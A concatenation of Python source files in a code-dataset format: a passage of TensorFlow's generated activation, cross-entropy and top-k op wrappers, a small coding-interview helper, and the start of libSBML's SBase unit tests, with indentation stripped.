if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Softplus", features=features, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
softplus, (), dict(features=features, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Softplus", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Softplus = tf_export("raw_ops.Softplus")(_ops.to_raw_op(softplus))
def softplus_eager_fallback(features, name, ctx):
_attr_T, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
_inputs_flat = [features]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"Softplus", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Softplus", _inputs_flat, _attrs, _result)
_result, = _result
return _result
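# Editorial sketch: softplus is a smooth approximation of relu, with
# softplus(0.) = log(2.) ~ 0.6931 (assumes `import tensorflow as tf`).
#
# >>> tf.math.softplus([-1., 0., 1.]).numpy()
# array([0.31326169, 0.6931472 , 1.3132616 ], dtype=float32)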
def softplus_grad(gradients, features, name=None):
r"""Computes softplus gradients for a softplus operation.
Args:
gradients: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
The backpropagated gradients to the corresponding softplus operation.
features: A `Tensor`. Must have the same type as `gradients`.
The features passed as input to the corresponding softplus operation.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `gradients`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "SoftplusGrad", name, gradients, features)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return softplus_grad_eager_fallback(
gradients, features, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"SoftplusGrad", gradients=gradients, features=features, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"SoftplusGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
SoftplusGrad = tf_export("raw_ops.SoftplusGrad")(_ops.to_raw_op(softplus_grad))
def softplus_grad_eager_fallback(gradients, features, name, ctx):
_attr_T, _inputs_T = _execute.args_to_matching_eager([gradients, features], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(gradients, features) = _inputs_T
_inputs_flat = [gradients, features]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"SoftplusGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"SoftplusGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export('nn.softsign', 'math.softsign')
def softsign(features, name=None):
r"""Computes softsign: `features / (abs(features) + 1)`.
Args:
features: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `features`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Softsign", name, features)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return softsign_eager_fallback(
features, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
softsign, (), dict(features=features, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Softsign", features=features, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
softsign, (), dict(features=features, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Softsign", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Softsign = tf_export("raw_ops.Softsign")(_ops.to_raw_op(softsign))
def softsign_eager_fallback(features, name, ctx):
_attr_T, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
_inputs_flat = [features]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"Softsign", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Softsign", _inputs_flat, _attrs, _result)
_result, = _result
return _result
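# Editorial usage sketch (assumes `import tensorflow as tf`): like tanh,
# softsign saturates toward +/-1, but only polynomially.
#
# >>> tf.math.softsign([-1., 0., 4.]).numpy()
# array([-0.5,  0. ,  0.8], dtype=float32)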
def softsign_grad(gradients, features, name=None):
r"""Computes softsign gradients for a softsign operation.
Args:
gradients: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
The backpropagated gradients to the corresponding softsign operation.
features: A `Tensor`. Must have the same type as `gradients`.
The features passed as input to the corresponding softsign operation.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `gradients`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "SoftsignGrad", name, gradients, features)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return softsign_grad_eager_fallback(
gradients, features, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"SoftsignGrad", gradients=gradients, features=features, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"SoftsignGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
SoftsignGrad = tf_export("raw_ops.SoftsignGrad")(_ops.to_raw_op(softsign_grad))
def softsign_grad_eager_fallback(gradients, features, name, ctx):
_attr_T, _inputs_T = _execute.args_to_matching_eager([gradients, features], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(gradients, features) = _inputs_T
_inputs_flat = [gradients, features]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"SoftsignGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"SoftsignGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
_SparseSoftmaxCrossEntropyWithLogitsOutput = collections.namedtuple(
"SparseSoftmaxCrossEntropyWithLogits",
["loss", "backprop"])
def sparse_softmax_cross_entropy_with_logits(features, labels, name=None):
r"""Computes softmax cross entropy cost and gradients to backpropagate.
Unlike `SoftmaxCrossEntropyWithLogits`, this operation does not accept
a matrix of label probabilities, but rather a single label per row
of features. This label is considered to have probability 1.0 for the
given row.
Inputs are the logits, not probabilities.
Args:
features: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
batch_size x num_classes matrix
labels: A `Tensor`. Must be one of the following types: `int32`, `int64`.
batch_size vector with values in [0, num_classes).
This is the label for the given minibatch entry.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (loss, backprop).
loss: A `Tensor`. Has the same type as `features`.
backprop: A `Tensor`. Has the same type as `features`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "SparseSoftmaxCrossEntropyWithLogits", name, features, labels)
_result = _SparseSoftmaxCrossEntropyWithLogitsOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return sparse_softmax_cross_entropy_with_logits_eager_fallback(
features, labels, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"SparseSoftmaxCrossEntropyWithLogits", features=features,
labels=labels, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "Tlabels",
_op._get_attr_type("Tlabels"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"SparseSoftmaxCrossEntropyWithLogits", _inputs_flat, _attrs, _result)
_result = _SparseSoftmaxCrossEntropyWithLogitsOutput._make(_result)
return _result
SparseSoftmaxCrossEntropyWithLogits = tf_export("raw_ops.SparseSoftmaxCrossEntropyWithLogits")(_ops.to_raw_op(sparse_softmax_cross_entropy_with_logits))
def sparse_softmax_cross_entropy_with_logits_eager_fallback(features, labels, name, ctx):
_attr_T, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
_attr_Tlabels, (labels,) = _execute.args_to_matching_eager([labels], ctx, [_dtypes.int32, _dtypes.int64, ], _dtypes.int64)
_inputs_flat = [features, labels]
_attrs = ("T", _attr_T, "Tlabels", _attr_Tlabels)
_result = _execute.execute(b"SparseSoftmaxCrossEntropyWithLogits", 2,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"SparseSoftmaxCrossEntropyWithLogits", _inputs_flat, _attrs, _result)
_result = _SparseSoftmaxCrossEntropyWithLogitsOutput._make(_result)
return _result
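# Editorial sketch via the public wrapper: `labels` holds one class index per
# row, equivalent to one-hot labels in the dense op above, so the loss matches
# the SoftmaxCrossEntropyWithLogits sketch (assumes `import tensorflow as tf`).
#
# >>> tf.nn.sparse_softmax_cross_entropy_with_logits(
# ...     labels=tf.constant([0]), logits=tf.constant([[2., 1., .1]])).numpy()
# array([0.41703], dtype=float32)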
_TopKOutput = collections.namedtuple(
"TopK",
["values", "indices"])
def top_k(input, k, sorted=True, name=None):
r"""Finds values and indices of the `k` largest elements for the last dimension.
If the input is a vector (rank-1), finds the `k` largest entries in the vector
and outputs their values and indices as vectors. Thus `values[j]` is the
`j`-th largest entry in `input`, and its index is `indices[j]`.
For matrices (resp. higher rank input), computes the top `k` entries in each
row (resp. vector along the last dimension). Thus,
values.shape = indices.shape = input.shape[:-1] + [k]
If two elements are equal, the lower-index element appears first.
If `k` varies dynamically, use `TopKV2` below.
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
1-D or higher with last dimension at least `k`.
k: An `int` that is `>= 0`.
Number of top elements to look for along the last dimension (along each
row for matrices).
sorted: An optional `bool`. Defaults to `True`.
If true the resulting `k` elements will be sorted by the values in
descending order.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (values, indices).
values: A `Tensor`. Has the same type as `input`.
indices: A `Tensor` of type `int32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "TopK", name, input, "k", k, "sorted", sorted)
_result = _TopKOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return top_k_eager_fallback(
input, k=k, sorted=sorted, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
k = _execute.make_int(k, "k")
if sorted is None:
sorted = True
sorted = _execute.make_bool(sorted, "sorted")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"TopK", input=input, k=k, sorted=sorted, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("k", _op._get_attr_int("k"), "sorted",
_op._get_attr_bool("sorted"), "T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"TopK", _inputs_flat, _attrs, _result)
_result = _TopKOutput._make(_result)
return _result
TopK = tf_export("raw_ops.TopK")(_ops.to_raw_op(top_k))
def top_k_eager_fallback(input, k, sorted, name, ctx):
k = _execute.make_int(k, "k")
if sorted is None:
sorted = True
sorted = _execute.make_bool(sorted, "sorted")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
_inputs_flat = [input]
_attrs = ("k", k, "sorted", sorted, "T", _attr_T)
_result = _execute.execute(b"TopK", 2, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"TopK", _inputs_flat, _attrs, _result)
_result = _TopKOutput._make(_result)
return _result
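# Editorial usage sketch via the public `tf.math.top_k` wrapper (assumes
# `import tensorflow as tf`); ties resolve toward the lower index, as noted in
# the docstring.
#
# >>> values, indices = tf.math.top_k(tf.constant([1., 5., 3., 4.]), k=2)
# >>> values.numpy(), indices.numpy()
# (array([5., 4.], dtype=float32), array([1, 3], dtype=int32))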
_TopKV2Output = collections.namedtuple(
"TopKV2",
["values", "indices"])
def top_kv2(input, k, sorted=True, name=None):
r"""Finds values and indices of the `k` largest elements for the last dimension.
If the input is a vector (rank-1), finds the `k` largest entries in the vector
and outputs their values and indices as vectors. Thus `values[j]` is the
`j`-th largest entry in `input`, and its index is `indices[j]`.
For matrices (resp. higher rank input), computes the top `k` entries in each
row (resp. vector along the last dimension). Thus,
values.shape = indices.shape = input.shape[:-1] + [k]
If two elements are equal, the lower-index element appears first.
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
1-D or higher with last dimension at least `k`.
k: A `Tensor` of type `int32`.
0-D. Number of top elements to look for along the last dimension (along each
row for matrices).
sorted: An optional `bool`. Defaults to `True`.
If true the resulting `k` elements will be sorted by the values in
descending order.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (values, indices).
values: A `Tensor`. Has the same type as `input`.
indices: A `Tensor` of type `int32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "TopKV2", name, input, k, "sorted", sorted)
_result = _TopKV2Output._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return top_kv2_eager_fallback(
input, k, sorted=sorted, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if sorted is None:
sorted = True
sorted = _execute.make_bool(sorted, "sorted")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"TopKV2", input=input, k=k, sorted=sorted, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("sorted", _op._get_attr_bool("sorted"), "T",
_op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"TopKV2", _inputs_flat, _attrs, _result)
_result = _TopKV2Output._make(_result)
return _result
TopKV2 = tf_export("raw_ops.TopKV2")(_ops.to_raw_op(top_kv2))
def top_kv2_eager_fallback(input, k, sorted, name, ctx):
if sorted is None:
sorted = True
sorted = _execute.make_bool(sorted, "sorted")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
k = _ops.convert_to_tensor(k, _dtypes.int32)
_inputs_flat = [input, k]
_attrs = ("sorted", sorted, "T", _attr_T)
_result = _execute.execute(b"TopKV2", 2, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"TopKV2", _inputs_flat, _attrs, _result)
_result = _TopKV2Output._make(_result)
return _result
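# Editorial sketch: unlike TopK, TopKV2 takes `k` as a tensor, so it can vary
# at run time (assumes `import tensorflow as tf`).
#
# >>> out = tf.raw_ops.TopKV2(input=tf.constant([1., 5., 3., 4.]),
# ...                         k=tf.constant(2))
# >>> out.values.numpy()
# array([5., 4.], dtype=float32)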
hexsha: 71820d12bab098d7930dfa657e13c499f2bbf944 | size: 166 | ext: py | language: Python
path: cracking_the_coding_interview_qs/16.13/half_square.py
repo: angelusualle/algorithms @ 86286a49db2a755bc57330cb455bcbd8241ea6be
licenses: ["Apache-2.0"] | stars: null | issues: null | forks: null
def half_square(sq1, sq2):
    # Return the center of each square; a square is a pair of opposite corners ((x1, y1), (x2, y2)).
    return (((sq1[0][0] + sq1[1][0]) / 2.0, (sq1[0][1] + sq1[1][1]) / 2.0),
            ((sq2[0][0] + sq2[1][0]) / 2.0, (sq2[0][1] + sq2[1][1]) / 2.0))
hexsha: 718fcc0b809d5056209169b3c8470cd3491d482a | size: 61,845 | ext: py | language: Python
path: src/libSBML/src/bindings/python/test/sbml/TestSBase.py
repo: copasi/copasi-dependencies @ c01dd455c843522375c32c2989aa8675f59bb810
licenses: ["Unlicense"] | stars: 5 (2015-04-16T14:27:38.000Z to 2021-11-30T14:54:39.000Z) | issues: 8 (2017-05-30T16:58:39.000Z to 2022-02-22T16:51:34.000Z) | forks: 7 (2016-05-29T08:12:59.000Z to 2019-05-02T13:39:25.000Z)
#
# @file TestSBase.py
# @brief SBase unit tests
#
# @author Akiya Jouraku (Python conversion)
# @author Ben Bornstein
#
# ====== WARNING ===== WARNING ===== WARNING ===== WARNING ===== WARNING ======
#
# DO NOT EDIT THIS FILE.
#
# This file was generated automatically by converting the file located at
# src/sbml/test/TestSBase.cpp
# using the conversion program dev/utilities/translateTests/translateTests.pl.
# Any changes made here will be lost the next time the file is regenerated.
#
# -----------------------------------------------------------------------------
# This file is part of libSBML. Please visit http://sbml.org for more
# information about SBML, and the latest version of libSBML.
#
# Copyright 2005-2010 California Institute of Technology.
# Copyright 2002-2005 California Institute of Technology and
# Japan Science and Technology Corporation.
#
# This library is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation. A copy of the license agreement is provided
# in the file named "LICENSE.txt" included with this software distribution
# and also available online as http://sbml.org/software/libsbml/license.html
# -----------------------------------------------------------------------------
import sys
import unittest
import libsbml
def wrapString(s):
return s
pass
class TestSBase(unittest.TestCase):
global S
S = None
def setUp(self):
self.S = libsbml.Model(2,4)
if (self.S == None):
pass
pass
def tearDown(self):
self.S = None
pass
def test_SBase_CVTerms(self):
cv = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv.setBiologicalQualifierType(libsbml.BQB_IS)
cv.addResource( "foo")
self.assert_( self.S.getNumCVTerms() == 0 )
#self.assert_( self.S.getCVTerms() == None )
self.assert_( len(self.S.getCVTerms()) == 0 )
self.S.setMetaId( "_id")
self.S.addCVTerm(cv)
self.assert_( self.S.getNumCVTerms() == 1 )
#self.assert_( self.S.getCVTerms() != None )
self.assert_( len(self.S.getCVTerms()) == 1 )
self.assert_( self.S.getCVTerm(0) != cv )
_dummyList = [ cv ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_addCVTerms(self):
cv = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv.setBiologicalQualifierType(libsbml.BQB_ENCODES)
cv.addResource( "foo")
self.S.setMetaId( "sbase1")
self.S.addCVTerm(cv)
self.assert_( self.S.getNumCVTerms() == 1 )
#self.assert_( self.S.getCVTerms() != None )
self.assert_( len(self.S.getCVTerms()) == 1 )
res = self.S.getCVTerm(0).getResources()
self.assert_(( "foo" == res.getValue(0) ))
cv1 = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv1.setBiologicalQualifierType(libsbml.BQB_IS)
cv1.addResource( "bar")
self.S.addCVTerm(cv1)
self.assert_( self.S.getNumCVTerms() == 2 )
cv2 = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv2.setBiologicalQualifierType(libsbml.BQB_IS)
cv2.addResource( "bar1")
self.S.addCVTerm(cv2)
self.assert_( self.S.getNumCVTerms() == 2 )
res = self.S.getCVTerm(1).getResources()
self.assert_( res.getLength() == 2 )
self.assert_(( "bar" == res.getValue(0) ))
self.assert_(( "bar1" == res.getValue(1) ))
cv4 = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv4.setBiologicalQualifierType(libsbml.BQB_IS)
cv4.addResource( "bar1")
self.S.addCVTerm(cv4)
self.assert_( self.S.getNumCVTerms() == 2 )
res = self.S.getCVTerm(1).getResources()
self.assert_( res.getLength() == 2 )
self.assert_(( "bar" == res.getValue(0) ))
self.assert_(( "bar1" == res.getValue(1) ))
cv5 = libsbml.CVTerm(libsbml.BIOLOGICAL_QUALIFIER)
cv5.setBiologicalQualifierType(libsbml.BQB_HAS_PART)
cv5.addResource( "bar1")
self.S.addCVTerm(cv5)
self.assert_( self.S.getNumCVTerms() == 2 )
res = self.S.getCVTerm(1).getResources()
self.assert_( res.getLength() == 2 )
self.assert_(( "bar" == res.getValue(0) ))
self.assert_(( "bar1" == res.getValue(1) ))
_dummyList = [ cv ]; _dummyList[:] = []; del _dummyList
_dummyList = [ cv2 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ cv1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ cv4 ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_appendNotes(self):
triple = libsbml.XMLTriple("p", "", "")
att = libsbml.XMLAttributes()
ns = libsbml.XMLNamespaces()
ns.add( "http://www.w3.org/1999/xhtml", "")
token4 = libsbml.XMLToken("This is my text")
node4 = libsbml.XMLNode(token4)
token5 = libsbml.XMLToken("This is additional text")
node5 = libsbml.XMLNode(token5)
token = libsbml.XMLToken(triple,att,ns)
node = libsbml.XMLNode(token)
node.addChild(node4)
self.S.setNotes(node)
self.assert_( self.S.isSetNotes() == True )
token1 = libsbml.XMLToken(triple,att,ns)
node1 = libsbml.XMLNode(token1)
node1.addChild(node5)
self.S.appendNotes(node1)
self.assert_( self.S.isSetNotes() == True )
node2 = self.S.getNotes()
self.assert_( node2.getNumChildren() == 2 )
self.assert_(( "p" == node2.getChild(0).getName() ))
self.assert_( node2.getChild(0).getNumChildren() == 1 )
self.assert_(( "p" == node2.getChild(1).getName() ))
self.assert_( node2.getChild(1).getNumChildren() == 1 )
chars1 = node2.getChild(0).getChild(0).getCharacters()
chars2 = node2.getChild(1).getChild(0).getCharacters()
self.assert_(( "This is my text" == chars1 ))
self.assert_(( "This is additional text" == chars2 ))
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ node1 ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_appendNotes1(self):
att = libsbml.XMLAttributes()
ns = libsbml.XMLNamespaces()
ns.add( "http://www.w3.org/1999/xhtml", "")
html_triple = libsbml.XMLTriple("html", "", "")
head_triple = libsbml.XMLTriple("head", "", "")
title_triple = libsbml.XMLTriple("title", "", "")
body_triple = libsbml.XMLTriple("body", "", "")
p_triple = libsbml.XMLTriple("p", "", "")
html_token = libsbml.XMLToken(html_triple,att,ns)
head_token = libsbml.XMLToken(head_triple,att)
title_token = libsbml.XMLToken(title_triple,att)
body_token = libsbml.XMLToken(body_triple,att)
p_token = libsbml.XMLToken(p_triple,att)
text_token = libsbml.XMLToken("This is my text")
html_node = libsbml.XMLNode(html_token)
head_node = libsbml.XMLNode(head_token)
title_node = libsbml.XMLNode(title_token)
body_node = libsbml.XMLNode(body_token)
p_node = libsbml.XMLNode(p_token)
text_node = libsbml.XMLNode(text_token)
text_token1 = libsbml.XMLToken("This is more text")
html_node1 = libsbml.XMLNode(html_token)
head_node1 = libsbml.XMLNode(head_token)
title_node1 = libsbml.XMLNode(title_token)
body_node1 = libsbml.XMLNode(body_token)
p_node1 = libsbml.XMLNode(p_token)
text_node1 = libsbml.XMLNode(text_token1)
p_node.addChild(text_node)
body_node.addChild(p_node)
head_node.addChild(title_node)
html_node.addChild(head_node)
html_node.addChild(body_node)
p_node1.addChild(text_node1)
body_node1.addChild(p_node1)
head_node1.addChild(title_node1)
html_node1.addChild(head_node1)
html_node1.addChild(body_node1)
self.S.setNotes(html_node)
self.S.appendNotes(html_node1)
notes = self.S.getNotes()
self.assert_(( "notes" == notes.getName() ))
self.assert_( notes.getNumChildren() == 1 )
child = notes.getChild(0)
self.assert_(( "html" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child = child.getChild(1)
self.assert_(( "body" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child1 = child.getChild(0)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is my text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
child1 = child.getChild(1)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is more text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
_dummyList = [ att ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_triple ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_token1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ head_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ body_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ p_node1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ text_node1 ]; _dummyList[:] = []; del _dummyList
pass
def test_SBase_appendNotes2(self):
att = libsbml.XMLAttributes()
ns = libsbml.XMLNamespaces()
ns.add( "http://www.w3.org/1999/xhtml", "")
html_triple = libsbml.XMLTriple("html", "", "")
head_triple = libsbml.XMLTriple("head", "", "")
title_triple = libsbml.XMLTriple("title", "", "")
body_triple = libsbml.XMLTriple("body", "", "")
p_triple = libsbml.XMLTriple("p", "", "")
html_token = libsbml.XMLToken(html_triple,att,ns)
head_token = libsbml.XMLToken(head_triple,att)
title_token = libsbml.XMLToken(title_triple,att)
body_token = libsbml.XMLToken(body_triple,att)
p_token = libsbml.XMLToken(p_triple,att)
text_token = libsbml.XMLToken("This is my text")
html_node = libsbml.XMLNode(html_token)
head_node = libsbml.XMLNode(head_token)
title_node = libsbml.XMLNode(title_token)
body_node = libsbml.XMLNode(body_token)
p_node = libsbml.XMLNode(p_token)
text_node = libsbml.XMLNode(text_token)
body_token1 = libsbml.XMLToken(body_triple,att,ns)
text_token1 = libsbml.XMLToken("This is more text")
body_node1 = libsbml.XMLNode(body_token1)
p_node1 = libsbml.XMLNode(p_token)
text_node1 = libsbml.XMLNode(text_token1)
p_node.addChild(text_node)
body_node.addChild(p_node)
head_node.addChild(title_node)
html_node.addChild(head_node)
html_node.addChild(body_node)
p_node1.addChild(text_node1)
body_node1.addChild(p_node1)
self.S.setNotes(html_node)
self.S.appendNotes(body_node1)
notes = self.S.getNotes()
self.assert_(( "notes" == notes.getName() ))
self.assert_( notes.getNumChildren() == 1 )
child = notes.getChild(0)
self.assert_(( "html" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child = child.getChild(1)
self.assert_(( "body" == child.getName() ))
self.assert_( child.getNumChildren() == 2 )
child1 = child.getChild(0)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is my text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
child1 = child.getChild(1)
self.assert_(( "p" == child1.getName() ))
self.assert_( child1.getNumChildren() == 1 )
child1 = child1.getChild(0)
self.assert_(( "This is more text" == child1.getCharacters() ))
self.assert_( child1.getNumChildren() == 0 )
_dummyList = [ att ]; _dummyList[:] = []; del _dummyList
_dummyList = [ ns ]; _dummyList[:] = []; del _dummyList
_dummyList = [ html_triple ]; _dummyList[:] = []; del _dummyList
